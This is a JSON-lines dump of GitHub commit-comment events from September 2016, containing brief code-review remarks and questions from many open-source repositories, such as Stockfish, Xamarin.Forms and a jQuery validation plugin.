{"id":"4612666539","type":"CommitCommentEvent","actor":{"login":"aslam558"},"repo":{"name":"posabsolute/jQuery-Validation-Engine"},"payload":{"comment":{"id":19158471,"position":null,"line":null,"path":null,"commit_id":"863793cb3697d3778554ab415e38e38374ce7cb3","created_at":"2016-09-24T15:08:17Z","updated_at":"2016-09-24T15:08:17Z","body":"\nBut it is not working for Drop-downs.Kindly suggest..\nThanks  in Advance. \nRegards Aslam\n\nSent from Yahoo Mail on Android \n \n  On Sat, 24 Sep, 2016 at 11:13 am, varun-k2<notifications@github.com> wrote:   \nHi @aslam558 ,\nLook for the below which decide the triggering event of plugin.\nvalidationEventTrigger: \"blur\",\nHere you have to add events like keyup keydown wherever you want plugin to validate the form.\nyou can also add this while initializing/attaching the plugin to form.\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub, or mute the thread.\n    \n"}},"created_at":"2016-09-24T15:08:17Z"}
{"id":"4612667390","type":"CommitCommentEvent","actor":{"login":"dennis-tra"},"repo":{"name":"finn-christiansen/solidstate"},"payload":{"comment":{"id":19158474,"position":null,"line":null,"path":null,"commit_id":"a43ad40d816f8c872f51f15f9ec2fec5cd5cb120","created_at":"2016-09-24T15:08:54Z","updated_at":"2016-09-24T15:08:54Z","body":"Warum das invert match?"}},"created_at":"2016-09-24T15:08:54Z"}
{"id":"4612668716","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19158481,"position":null,"line":null,"path":null,"commit_id":"9451be3af8974f2b059719b4e6f03b9533446a1e","created_at":"2016-09-24T15:09:45Z","updated_at":"2016-09-24T15:09:45Z","body":"@Rocky640 More exactly, he should use\r\n\r\n````\r\nb = e->semiopenFiles[Us] ^ 0xFF;\r\ne->islands[Us] = popcount(b & ~(b >> 1));\r\n````\r\n\r\nI explained it there: https://github.com/lucabrivio/Stockfish/compare/602d7fb...2cb26d1\r\n\r\n"}},"created_at":"2016-09-24T15:09:45Z"}
{"id":"4612668814","type":"CommitCommentEvent","actor":{"login":"sean-roberts"},"repo":{"name":"hypothesis/h"},"payload":{"comment":{"id":19158483,"position":4,"line":66,"path":"h/static/styles/partials-v2/_search.scss","commit_id":"f42d9c15f8cdb241374a6a5daa502944c2c803ef","created_at":"2016-09-24T15:09:49Z","updated_at":"2016-09-24T15:09:49Z","body":"Not sure how that happened. Fixing now!"}},"created_at":"2016-09-24T15:09:49Z"}
{"id":"4612669944","type":"CommitCommentEvent","actor":{"login":"alexylem"},"repo":{"name":"alexylem/jarvis"},"payload":{"comment":{"id":19158487,"position":null,"line":null,"path":null,"commit_id":"eda4ddf10803f4304c79cb4e381fcc664d5981bd","created_at":"2016-09-24T15:10:34Z","updated_at":"2016-09-24T15:10:34Z","body":"Tu as installé les locals fr sur ton raspberry pi? si non je te conseille d'ouvrir un ticket 😉 "}},"created_at":"2016-09-24T15:10:34Z"}
{"id":"4612671491","type":"CommitCommentEvent","actor":{"login":"Laizerox"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":19158495,"position":4,"line":9984,"path":"src/game/Unit.cpp","commit_id":"a16b6e58801e1e0a1d253a86378d646b339bd9d4","created_at":"2016-09-24T15:11:35Z","updated_at":"2016-09-24T15:11:35Z","body":"Also for channeled spells (Eye pf Kilrog) this is wrong, it should dspawn based on max channeling timer and unsummon type should be timer or on death. Because cancelling channeling should force despawn either way this is just minor detail and aura removal will force delete it anyway."}},"created_at":"2016-09-24T15:11:35Z"}
{"id":"4612677779","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19158519,"position":null,"line":null,"path":null,"commit_id":"76494e5f9ced188d15e218ac365b43cbd748f49d","created_at":"2016-09-24T15:16:04Z","updated_at":"2016-09-24T15:16:04Z","body":"Not related. The current commit is for the HW renderer."}},"created_at":"2016-09-24T15:16:04Z"}
{"id":"4612685262","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19158548,"position":22,"line":94,"path":"QuickSubmitPlugin.inc.php","commit_id":"9338ccfd9cda95683ce37d1b9c1e64df9f39d0f5","created_at":"2016-09-24T15:21:19Z","updated_at":"2016-09-24T15:21:19Z","body":"Of course, not a problem at all!"}},"created_at":"2016-09-24T15:21:19Z"}
{"id":"4612687485","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":19158556,"position":4,"line":9984,"path":"src/game/Unit.cpp","commit_id":"a16b6e58801e1e0a1d253a86378d646b339bd9d4","created_at":"2016-09-24T15:22:50Z","updated_at":"2016-09-24T15:22:50Z","body":"Whoever wrote this comment should be ashamed then;\r\nhttps://github.com/cmangos/mangos-wotlk/blob/ff2d9d325692b4a4f86ecdf76dbd8fe2dd2624af/src/game/Pet.cpp#L474"}},"created_at":"2016-09-24T15:22:50Z"}
{"id":"4612688840","type":"CommitCommentEvent","actor":{"login":"t-kenji"},"repo":{"name":"t-kenji/trac-tags-plugin"},"payload":{"comment":{"id":19158565,"position":5,"line":89,"path":"tractags/db.py","commit_id":"9186979aa8d91d190625e0e9a58260124e4ebcad","created_at":"2016-09-24T15:23:50Z","updated_at":"2016-09-24T15:23:50Z","body":"TypeError: execute() takes at least 2 arguments (1 given)"}},"created_at":"2016-09-24T15:23:50Z"}
{"id":"4612688955","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"GalaticStryder/kernel_lge_msm8974"},"payload":{"comment":{"id":19158567,"position":null,"line":null,"path":null,"commit_id":"c7092b95329247b751acafaa70567394856cd071","created_at":"2016-09-24T15:23:53Z","updated_at":"2016-09-24T15:23:53Z","body":"Check this for bluplug:\r\nhttps://github.com/neobuddy89/shamu/commits/cm-13.0-bluplug"}},"created_at":"2016-09-24T15:23:53Z"}
{"id":"4612692121","type":"CommitCommentEvent","actor":{"login":"leolobato"},"repo":{"name":"jasarien/Provenance"},"payload":{"comment":{"id":19158580,"position":47,"line":1833,"path":"Provenance.xcodeproj/project.pbxproj","commit_id":"5a87b75c29f5d2e769ced0a6648f209b5b286150","created_at":"2016-09-24T15:25:52Z","updated_at":"2016-09-24T15:25:52Z","body":"Not sure how this got here, but it broke the tvOS targets."}},"created_at":"2016-09-24T15:25:52Z"}
{"id":"4612693164","type":"CommitCommentEvent","actor":{"login":"samcorcoran"},"repo":{"name":"samcorcoran/everett"},"payload":{"comment":{"id":19158584,"position":7,"line":0,"path":"nodetools.py","commit_id":"4d798e3f38e37c4d3fe02240fa403b8c20744bcd","created_at":"2016-09-24T15:26:36Z","updated_at":"2016-09-24T15:26:36Z","body":"Prime candidate for a climate module"}},"created_at":"2016-09-24T15:26:36Z"}
{"id":"4612693446","type":"CommitCommentEvent","actor":{"login":"iesteban"},"repo":{"name":"Semillas/semillas_backend"},"payload":{"comment":{"id":19158585,"position":29,"line":45,"path":"semillas_backend/templates/base.html","commit_id":"88c46cbb2026594c606476a692e64c25177a98e7","created_at":"2016-09-24T15:26:46Z","updated_at":"2016-09-24T15:26:46Z","body":"This is cool"}},"created_at":"2016-09-24T15:26:46Z"}
{"id":"4612694690","type":"CommitCommentEvent","actor":{"login":"jasarien"},"repo":{"name":"jasarien/Provenance"},"payload":{"comment":{"id":19158590,"position":47,"line":1833,"path":"Provenance.xcodeproj/project.pbxproj","commit_id":"5a87b75c29f5d2e769ced0a6648f209b5b286150","created_at":"2016-09-24T15:27:36Z","updated_at":"2016-09-24T15:27:36Z","body":"Boo, my bad. I reset the setting back to default didn't thing it would mess anything up. "}},"created_at":"2016-09-24T15:27:36Z"}
{"id":"4612695881","type":"CommitCommentEvent","actor":{"login":"erickwill"},"repo":{"name":"erickwill/android_device_samsung_trelte-common"},"payload":{"comment":{"id":19158593,"position":null,"line":null,"path":null,"commit_id":"07951a26abfe81a44e3f085e69aaf9cfc459a2c5","created_at":"2016-09-24T15:28:26Z","updated_at":"2016-09-24T15:28:26Z","body":"Starting commits to CM-14.0"}},"created_at":"2016-09-24T15:28:26Z"}
{"id":"4612697268","type":"CommitCommentEvent","actor":{"login":"Ric511"},"repo":{"name":"Ric511/coupon-codes-for-uglEbook"},"payload":{"comment":{"id":19158599,"position":null,"line":null,"path":null,"commit_id":"dd3c6b3a655b5f58bced557ccea2f6af915e42f6","created_at":"2016-09-24T15:29:14Z","updated_at":"2016-09-24T15:29:14Z","body":"thanks I appreciate it"}},"created_at":"2016-09-24T15:29:14Z"}
{"id":"4612699051","type":"CommitCommentEvent","actor":{"login":"gryaznov"},"repo":{"name":"andrew-pelykh/RoR-courses-Pelykh"},"payload":{"comment":{"id":19158608,"position":5,"line":6,"path":"app/controllers/posts_controller.rb","commit_id":"a04257c2df34dce8edf29fdb6a4cb0e445f16a25","created_at":"2016-09-24T15:30:19Z","updated_at":"2016-09-24T15:30:19Z","body":"Не `#show_page`, а просто `#show`. Чому так - поясню на занятті в понеділок. Коротка версія - це одна з конвенцій."}},"created_at":"2016-09-24T15:30:19Z"}
{"id":"4612700669","type":"CommitCommentEvent","actor":{"login":"perfectboy"},"repo":{"name":"perfectboy/Student-2048new"},"payload":{"comment":{"id":19158613,"position":null,"line":null,"path":null,"commit_id":"3dcb06587521d320b2323bf6e8dc0f58825a6320","created_at":"2016-09-24T15:31:19Z","updated_at":"2016-09-24T15:31:19Z","body":"这里应该还有一个版本，但是没加。:joy:"}},"created_at":"2016-09-24T15:31:19Z"}
{"id":"4612700882","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":19158614,"position":null,"line":null,"path":null,"commit_id":"0d60c459ff324cd460145f73215d28356d0a4e69","created_at":"2016-09-24T15:31:27Z","updated_at":"2016-09-24T15:31:27Z","body":"I'm afraid SPSA is not good for this kind of tuning, unless you do it in a very small range, say [-15,+15]... because otherwise the eval function will be extremely nonlinear, for a lot of reasons, I think..."}},"created_at":"2016-09-24T15:31:27Z"}
{"id":"4612700921","type":"CommitCommentEvent","actor":{"login":"gryaznov"},"repo":{"name":"andrew-pelykh/RoR-courses-Pelykh"},"payload":{"comment":{"id":19158615,"position":4,"line":4,"path":"config/routes.rb","commit_id":"a04257c2df34dce8edf29fdb6a4cb0e445f16a25","created_at":"2016-09-24T15:31:28Z","updated_at":"2016-09-24T15:31:28Z","body":"Відповідно і тут `=> posts#show`. Є спосіб набагато зручніший, але до цього ми теж поки не дійшли."}},"created_at":"2016-09-24T15:31:28Z"}
{"id":"4612703837","type":"CommitCommentEvent","actor":{"login":"ninomiyakazunarui"},"repo":{"name":"TeacherLv/Teaching"},"payload":{"comment":{"id":19158622,"position":null,"line":null,"path":null,"commit_id":"9e9692da54b6969fc5d617523caf3f082dd20cb3","created_at":"2016-09-24T15:33:25Z","updated_at":"2016-09-24T15:33:25Z","body":"第三周作业"}},"created_at":"2016-09-24T15:33:25Z"}
{"id":"4612706938","type":"CommitCommentEvent","actor":{"login":"martinbean"},"repo":{"name":"laravel/laravel"},"payload":{"comment":{"id":19158627,"position":null,"line":null,"path":null,"commit_id":"dcf971805df5e5cb86b03ced4240c5bbbe516164","created_at":"2016-09-24T15:35:29Z","updated_at":"2016-09-24T15:35:29Z","body":"I was going to open a pull request with this change! 😄 "}},"created_at":"2016-09-24T15:35:29Z"}
{"id":"4612707485","type":"CommitCommentEvent","actor":{"login":"ObaniGemini"},"repo":{"name":"MinetestForFun/server-minetestforfun"},"payload":{"comment":{"id":19158630,"position":null,"line":null,"path":null,"commit_id":"59c4c8e919183e9e45282b1ac0a8d74689f36f20","created_at":"2016-09-24T15:35:50Z","updated_at":"2016-09-24T15:35:50Z","body":"Maybe that text could be cleaned out a bit, most of the players (including fools like me) can't stay reading all the stuff as you would @LeMagnesium, @Darcidride :smile: "}},"created_at":"2016-09-24T15:35:50Z"}
{"id":"4612707846","type":"CommitCommentEvent","actor":{"login":"DJCrapsody"},"repo":{"name":"gitskarios/Gitskarios"},"payload":{"comment":{"id":19158632,"position":null,"line":null,"path":null,"commit_id":"bd1a915ba890b4ca4ab72302c46fd7c328efe1fa","created_at":"2016-09-24T15:36:06Z","updated_at":"2016-09-24T15:36:06Z","body":"seems like I can't get this update, no one is accepting anyone on the beta G+ community."}},"created_at":"2016-09-24T15:36:06Z"}
{"id":"4612709098","type":"CommitCommentEvent","actor":{"login":"samcorcoran"},"repo":{"name":"samcorcoran/everett"},"payload":{"comment":{"id":19158638,"position":38,"line":0,"path":"nodetools.py","commit_id":"4d798e3f38e37c4d3fe02240fa403b8c20744bcd","created_at":"2016-09-24T15:37:00Z","updated_at":"2016-09-24T15:37:00Z","body":"It's valid to have no downwind neighbour if it is valid to have a zero magnitude wind. The downwind _ neighbour property should just be documented as having none as a valid return value to be handled by calling code.\n\nNot having a wind value might be more cause for an exception if it is expected at this point."}},"created_at":"2016-09-24T15:37:00Z"}
{"id":"4612709384","type":"CommitCommentEvent","actor":{"login":"ramonornela"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":19158639,"position":null,"line":null,"path":null,"commit_id":"c33842f8f027d0ccd0259e807a3a6c64bc4b81f0","created_at":"2016-09-24T15:37:13Z","updated_at":"2016-09-24T15:37:13Z","body":"@mlynch would not be best create an branch release 1.3 to fix bugs\r\n\r\nThanks"}},"created_at":"2016-09-24T15:37:13Z"}
{"id":"4612718455","type":"CommitCommentEvent","actor":{"login":"perfectboy"},"repo":{"name":"perfectboy/Student-2048new"},"payload":{"comment":{"id":19158660,"position":null,"line":null,"path":null,"commit_id":"3dcb06587521d320b2323bf6e8dc0f58825a6320","created_at":"2016-09-24T15:40:51Z","updated_at":"2016-09-24T15:40:51Z","body":"这里应该还有一个版本，但是没加。:joy: <br />\r\nGame Over 还是那样，但比我以前的版本成熟多了。 :kissing_heart: "}},"created_at":"2016-09-24T15:40:51Z"}
{"id":"4612722566","type":"CommitCommentEvent","actor":{"login":"nigoroll"},"repo":{"name":"varnishcache/libvmod-example"},"payload":{"comment":{"id":19158675,"position":null,"line":null,"path":null,"commit_id":"c686b08c3814fc86e73ef5eec1008a428fe6a58f","created_at":"2016-09-24T15:42:31Z","updated_at":"2016-09-24T15:42:31Z","body":"@Dridi I took some tiny bits from your bootstrap script, I hope that's ok. If not, we need to un-copyright edit it ;)\r\nIf you're happy with the script, I suggest you also use it for your vmod to improve compatibility with non-bash and improve error handling"}},"created_at":"2016-09-24T15:42:31Z"}
{"id":"4612722807","type":"CommitCommentEvent","actor":{"login":"perfectboy"},"repo":{"name":"perfectboy/Student-2048"},"payload":{"comment":{"id":19158676,"position":null,"line":null,"path":null,"commit_id":"9eae5bbc4541a423506522fa4dffdb66432d899d","created_at":"2016-09-24T15:42:42Z","updated_at":"2016-09-24T15:42:42Z","body":"Game Over 还是那样，但比我以前的版本成熟多了。 :kissing_heart:"}},"created_at":"2016-09-24T15:42:42Z"}
{"id":"4612722815","type":"CommitCommentEvent","actor":{"login":"suranT0T"},"repo":{"name":"suranT0T/leetcode"},"payload":{"comment":{"id":19158677,"position":13,"line":13,"path":"#9Palindrome_Number.cpp","commit_id":"bc5eca2a8de8e9ee1e7f8ea95a00e47463537356","created_at":"2016-09-24T15:42:42Z","updated_at":"2016-09-24T15:42:42Z","body":"zzz"}},"created_at":"2016-09-24T15:42:42Z"}
{"id":"4612724758","type":"CommitCommentEvent","actor":{"login":"perfectboy"},"repo":{"name":"perfectboy/Student-2048"},"payload":{"comment":{"id":19158685,"position":null,"line":null,"path":null,"commit_id":"9eae5bbc4541a423506522fa4dffdb66432d899d","created_at":"2016-09-24T15:43:56Z","updated_at":"2016-09-24T15:43:56Z","body":"Game Over 还是那样，但比我以前的版本成熟多了。 :kissing_heart:<br />\r\n（不许动不动就喜欢xxx！:angry:）"}},"created_at":"2016-09-24T15:43:56Z"}
{"id":"4612725926","type":"CommitCommentEvent","actor":{"login":"perfectboy"},"repo":{"name":"perfectboy/Student-2048II"},"payload":{"comment":{"id":19158689,"position":null,"line":null,"path":null,"commit_id":"ada898eb5925a6cba3518f76edadbfba761f9548","created_at":"2016-09-24T15:44:46Z","updated_at":"2016-09-24T15:44:46Z","body":"Game Over 还是那样，但比我以前的版本成熟多了。 :kissing_heart:\r\n"}},"created_at":"2016-09-24T15:44:46Z"}
{"id":"4612730424","type":"CommitCommentEvent","actor":{"login":"natecook1000"},"repo":{"name":"lorentey/BTree"},"payload":{"comment":{"id":19158702,"position":null,"line":null,"path":null,"commit_id":"d3a68aa976fe05a939fbaba4002ad0b0e571e376","created_at":"2016-09-24T15:47:46Z","updated_at":"2016-09-24T15:47:46Z","body":"Nice 👍 \r\n\r\n`SortedSet` could benefit from providing `_customContainsEquatableElement` and `_customIndexOfEquatableElement` instead of `contains(_:)` and `index(of:)`, so that it will still have good performance in a generic context."}},"created_at":"2016-09-24T15:47:46Z"}
{"id":"4612730892","type":"CommitCommentEvent","actor":{"login":"Daveee10"},"repo":{"name":"MicroSur/myevic"},"payload":{"comment":{"id":19158703,"position":null,"line":null,"path":null,"commit_id":"4f38c9f6571fed1f6b1a6fa13916afa71b06ba08","created_at":"2016-09-24T15:48:03Z","updated_at":"2016-09-24T15:48:03Z","body":"IMO you can use DrawStringCentered( STRING, y_pos ) for Power and Bypass strings. That's more eye friendly method :)\r\nBest Regards,\r\nDave"}},"created_at":"2016-09-24T15:48:03Z"}
{"id":"4612734332","type":"CommitCommentEvent","actor":{"login":"nageshkollu"},"repo":{"name":"nageshkollu/hello-world"},"payload":{"comment":{"id":19158716,"position":null,"line":null,"path":null,"commit_id":"30b9741c1585379526e24d920e4e21e77b3a7b44","created_at":"2016-09-24T15:50:12Z","updated_at":"2016-09-24T15:50:12Z","body":"My first repository\r\n"}},"created_at":"2016-09-24T15:50:12Z"}
{"id":"4612736107","type":"CommitCommentEvent","actor":{"login":"finn-christiansen"},"repo":{"name":"finn-christiansen/solidstate"},"payload":{"comment":{"id":19158719,"position":null,"line":null,"path":null,"commit_id":"a43ad40d816f8c872f51f15f9ec2fec5cd5cb120","created_at":"2016-09-24T15:51:26Z","updated_at":"2016-09-24T15:51:26Z","body":"Anki gibt beim Importieren ein Log aus. Dabei werden zuerst alle Zeilen angezeigt, die er ignoriert hat. Danach werden erst die wichtigen Informationen angezeigt, nämlich wie viele Karten hinzugefügt, gelöscht und aktualisiert wurden. Und es ist nervig, wenn man immer erst runterscrollen muss, um die relevanten Informationen zu sehen. Also schließt das invertierte grep alle Zeilen aus, die Anki eh ignoriert."}},"created_at":"2016-09-24T15:51:26Z"}
{"id":"4612739747","type":"CommitCommentEvent","actor":{"login":"infojunkie"},"repo":{"name":"meedan/check-api"},"payload":{"comment":{"id":19158736,"position":16,"line":21,"path":"lib/pender_data.rb","commit_id":"e95d7473c6c9e3d22a78977cf4db388ab6728780","created_at":"2016-09-24T15:54:02Z","updated_at":"2016-09-24T15:54:02Z","body":"Yes the annotator should be 'Pender', but I'm not sure yet how to represent that bot user. No, let's not display  this annotation type on the client."}},"created_at":"2016-09-24T15:54:02Z"}
{"id":"4612742213","type":"CommitCommentEvent","actor":{"login":"ecfrs"},"repo":{"name":"ecfrs/emersonferreira"},"payload":{"comment":{"id":19158744,"position":null,"line":null,"path":null,"commit_id":"0d8bf9653911fdc5d665f80603d9c3b060780053","created_at":"2016-09-24T15:55:47Z","updated_at":"2016-09-24T15:55:47Z","body":"Inclusão do download"}},"created_at":"2016-09-24T15:55:47Z"}
{"id":"4612742863","type":"CommitCommentEvent","actor":{"login":"dinosaadeh"},"repo":{"name":"dinosaadeh/Barjis"},"payload":{"comment":{"id":19158747,"position":93,"line":438,"path":"core/src/com/smb215team/barjis/game/GameController.java","commit_id":"4bc51ff26d8847d102dfcba1c4026f115b5cee33","created_at":"2016-09-24T15:56:12Z","updated_at":"2016-09-24T15:56:12Z","body":"Ok, I did some clean up and formatting for this code.. Anyways, I don't understand.. if pawn is dead you play a sound? Besides, let's not hard code if player is 0 or 1 for sound.. If there is no other way, no need for sound anyways.\r\n\r\nIf this was a request I put as an issue, sorry for that.. no need for it."}},"created_at":"2016-09-24T15:56:12Z"}
{"id":"4612746393","type":"CommitCommentEvent","actor":{"login":"florin-chelaru"},"repo":{"name":"xamarin/Xamarin.Forms"},"payload":{"comment":{"id":19158752,"position":null,"line":null,"path":null,"commit_id":"506a787b60aafd74f0cc457f6fe484577e658f54","created_at":"2016-09-24T15:58:35Z","updated_at":"2016-09-24T15:58:35Z","body":"Thank you for applying this fix! This call for the disposed renderer is caused by `HandleToolbarItemPropertyChanged`, which is not properly unregistered in `Dispose()` for each of the toolbar items. \r\n\r\nMay I suggest an additional fix along these lines:\r\n\r\n```\r\n    protected override void Dispose(bool disposing) \r\n    {\r\n        // ...\r\n        if (_toolbarTracker != null)\r\n        {\r\n            foreach (ToolbarItem item in _toolbarTracker.ToolbarItems)\r\n            {\r\n                item.PropertyChanged -= HandleToolbarItemPropertyChanged;\r\n            }\r\n            _toolbarTracker.CollectionChanged -= ToolbarTrackerOnCollectionChanged;\r\n            _toolbarTracker.Target = null;\r\n            _toolbarTracker = null;\r\n        }\r\n        // ...\r\n    }\r\n```"}},"created_at":"2016-09-24T15:58:35Z"}
{"id":"4612747045","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19158757,"position":null,"line":null,"path":null,"commit_id":"9451be3af8974f2b059719b4e6f03b9533446a1e","created_at":"2016-09-24T15:59:04Z","updated_at":"2016-09-24T15:59:04Z","body":"@Rocky640 @snicolet Thanks to both of you! Somehow I must have missed these tests. In my next try I will certainly use this faster calculation."}},"created_at":"2016-09-24T15:59:04Z"}
{"id":"4612747938","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"Jim00000/phonebook"},"payload":{"comment":{"id":19158758,"position":null,"line":null,"path":null,"commit_id":"13da8846241611345fca000d81f9c8ac2088e9b8","created_at":"2016-09-24T15:59:38Z","updated_at":"2016-09-24T15:59:38Z","body":"You don't have to mention the file name in GIT commit messages since git always tracks it. Instead, you should explain the functional changes."}},"created_at":"2016-09-24T15:59:38Z"}
{"id":"4612749206","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"Jim00000/phonebook"},"payload":{"comment":{"id":19158763,"position":null,"line":null,"path":null,"commit_id":"5ff5797a54bd9ff8f14e3f6e232b1d7f7dfc07f1","created_at":"2016-09-24T16:00:19Z","updated_at":"2016-09-24T16:00:19Z","body":"Please read the article carefully: http://chris.beams.io/posts/git-commit/"}},"created_at":"2016-09-24T16:00:19Z"}
{"id":"4612749599","type":"CommitCommentEvent","actor":{"login":"Reignarr"},"repo":{"name":"Reignarr/SharpProj"},"payload":{"comment":{"id":19158764,"position":null,"line":null,"path":null,"commit_id":"01cab670ad73c5489392ad6ba49e352f755a7ec3","created_at":"2016-09-24T16:00:30Z","updated_at":"2016-09-24T16:00:30Z","body":"In process"}},"created_at":"2016-09-24T16:00:30Z"}
{"id":"4612749751","type":"CommitCommentEvent","actor":{"login":"urwithajit9"},"repo":{"name":"serval-snt-uni-lu/RepackageRepo"},"payload":{"comment":{"id":19158765,"position":null,"line":null,"path":null,"commit_id":"7a292dd00ce66802ab58f950f85c00f4a7ec985d","created_at":"2016-09-24T16:00:35Z","updated_at":"2016-09-24T16:00:35Z","body":"Hi ,\r\nI have renamed all papers as your suggestions.\r\nI have also added one .bib file having all bibtex entry of articles.\r\nWith Regards.\r\nAjit"}},"created_at":"2016-09-24T16:00:35Z"}
{"id":"4612749798","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"Jim00000/phonebook"},"payload":{"comment":{"id":19158766,"position":null,"line":null,"path":null,"commit_id":"5ff5797a54bd9ff8f14e3f6e232b1d7f7dfc07f1","created_at":"2016-09-24T16:00:36Z","updated_at":"2016-09-24T16:00:36Z","body":"You should write down meaningful commit messages!"}},"created_at":"2016-09-24T16:00:36Z"}
{"id":"4612750429","type":"CommitCommentEvent","actor":{"login":"ComMouse"},"repo":{"name":"arrowrowe/tam"},"payload":{"comment":{"id":19158768,"position":null,"line":null,"path":null,"commit_id":"b9ff5e3565a523c29c7c6bb5b724bd4512157c57","created_at":"2016-09-24T16:01:00Z","updated_at":"2016-09-24T16:01:00Z","body":"Good job =w="}},"created_at":"2016-09-24T16:01:00Z"}
{"id":"4612753393","type":"CommitCommentEvent","actor":{"login":"ackman678"},"repo":{"name":"denehyg/reveal.js-menu"},"payload":{"comment":{"id":19158773,"position":null,"line":null,"path":null,"commit_id":"a1000f912d649c28a279b48b68bab1217b7be894","created_at":"2016-09-24T16:02:54Z","updated_at":"2016-09-24T16:02:54Z","body":"Cool-- great plugin by the way, lovin' it!\r\n"}},"created_at":"2016-09-24T16:02:54Z"}
{"id":"4612754389","type":"CommitCommentEvent","actor":{"login":"lpp1214"},"repo":{"name":"lpp1214/Hadoop-GIS"},"payload":{"comment":{"id":19158775,"position":2,"line":2,"path":"README.md","commit_id":"88cdf75fdbcdec6387a1868723e771a44fac3145","created_at":"2016-09-24T16:03:32Z","updated_at":"2016-09-24T16:03:32Z","body":"like"}},"created_at":"2016-09-24T16:03:32Z"}
{"id":"4612754655","type":"CommitCommentEvent","actor":{"login":"TwilekQueen"},"repo":{"name":"DeviousDevices/DDi"},"payload":{"comment":{"id":19158777,"position":null,"line":null,"path":null,"commit_id":"16db08de540db7ca2103e3d8cabae54d182294bf","created_at":"2016-09-24T16:03:44Z","updated_at":"2016-09-24T16:03:44Z","body":"Oh gosh did you know github has inbuilt support for bitmoji??? ![bitmoji](https://render.bitstrips.com/v2/cpanel/7638184-133853987_2-s4-v1.png?transparent=1&width=246)"}},"created_at":"2016-09-24T16:03:44Z"}
{"id":"4612755971","type":"CommitCommentEvent","actor":{"login":"1978lo"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19158780,"position":null,"line":null,"path":null,"commit_id":"5b519ed6791ff0ba43efc12ec338b9a5aec47f5f","created_at":"2016-09-24T16:04:36Z","updated_at":"2016-09-24T16:04:36Z","body":"怎樣取得session？"}},"created_at":"2016-09-24T16:04:36Z"}
{"id":"4612756105","type":"CommitCommentEvent","actor":{"login":"grapherd"},"repo":{"name":"grapherd/phonebook-1"},"payload":{"comment":{"id":19158781,"position":26,"line":33,"path":"phonebook_opt.h","commit_id":"4a9b75244ff8bcb2ab1c7822a37f4cf6e080f36a","created_at":"2016-09-24T16:04:41Z","updated_at":"2016-09-24T16:04:41Z","body":"da, that a mistake.\r\n\r\nbut why `findName` using `lastname` and `append` using `lastName` ?"}},"created_at":"2016-09-24T16:04:41Z"}
{"id":"4612756452","type":"CommitCommentEvent","actor":{"login":"AJRedDevil"},"repo":{"name":"mosh-hamedani/angular2-course"},"payload":{"comment":{"id":19158784,"position":null,"line":null,"path":null,"commit_id":"29bbb8b2d8961321557f487c1b6203d1ce500280","created_at":"2016-09-24T16:04:57Z","updated_at":"2016-09-24T16:04:57Z","body":"@Rajivkumar87 You forgot to return from the Service for Post request."}},"created_at":"2016-09-24T16:04:57Z"}
{"id":"4612756856","type":"CommitCommentEvent","actor":{"login":"K-atc"},"repo":{"name":"Ping-Mic/tools"},"payload":{"comment":{"id":19158787,"position":null,"line":null,"path":null,"commit_id":"f2eecffaa19d36114ef7ccb8b11f142192ab8e09","created_at":"2016-09-24T16:05:12Z","updated_at":"2016-09-24T16:05:12Z","body":"`no #find and no #avoid is not given. exit`\r\n→ `no #find and #avoid are given. exit`"}},"created_at":"2016-09-24T16:05:12Z"}
{"id":"4612757236","type":"CommitCommentEvent","actor":{"login":"physicien"},"repo":{"name":"alexylem/jarvis"},"payload":{"comment":{"id":19158788,"position":null,"line":null,"path":null,"commit_id":"eda4ddf10803f4304c79cb4e381fcc664d5981bd","created_at":"2016-09-24T16:05:26Z","updated_at":"2016-09-24T16:05:26Z","body":"C'était bien ça :rocket: "}},"created_at":"2016-09-24T16:05:26Z"}
{"id":"4612760588","type":"CommitCommentEvent","actor":{"login":"Jim00000"},"repo":{"name":"Jim00000/phonebook"},"payload":{"comment":{"id":19158793,"position":null,"line":null,"path":null,"commit_id":"5ff5797a54bd9ff8f14e3f6e232b1d7f7dfc07f1","created_at":"2016-09-24T16:07:28Z","updated_at":"2016-09-24T16:07:28Z","body":"I got it"}},"created_at":"2016-09-24T16:07:28Z"}
{"id":"4612760974","type":"CommitCommentEvent","actor":{"login":"grapherd"},"repo":{"name":"grapherd/phonebook-1"},"payload":{"comment":{"id":19158795,"position":null,"line":null,"path":null,"commit_id":"f561efa41ca9546e87a8e883096bcf3e78c5b64f","created_at":"2016-09-24T16:07:46Z","updated_at":"2016-09-24T16:07:46Z","body":"I misunderstand with kernel style commit,\r\nin kernel driver, if we change drivers/staging/most files, commit title will be like\r\n`staging: most: constify snd_pcm_ops structure`\r\n\r\nbut I misunderstand about this......\r\n"}},"created_at":"2016-09-24T16:07:46Z"}
{"id":"4612761218","type":"CommitCommentEvent","actor":{"login":"FauziAkram"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":19158798,"position":null,"line":null,"path":null,"commit_id":"0d60c459ff324cd460145f73215d28356d0a4e69","created_at":"2016-09-24T16:07:55Z","updated_at":"2016-09-24T16:07:55Z","body":"Hi Luca,\r\nNo I have done this tuning before, and it has bring some elo, but not enough to pass , now i include also midgame limit which I think is far away from being perfect."}},"created_at":"2016-09-24T16:07:55Z"}
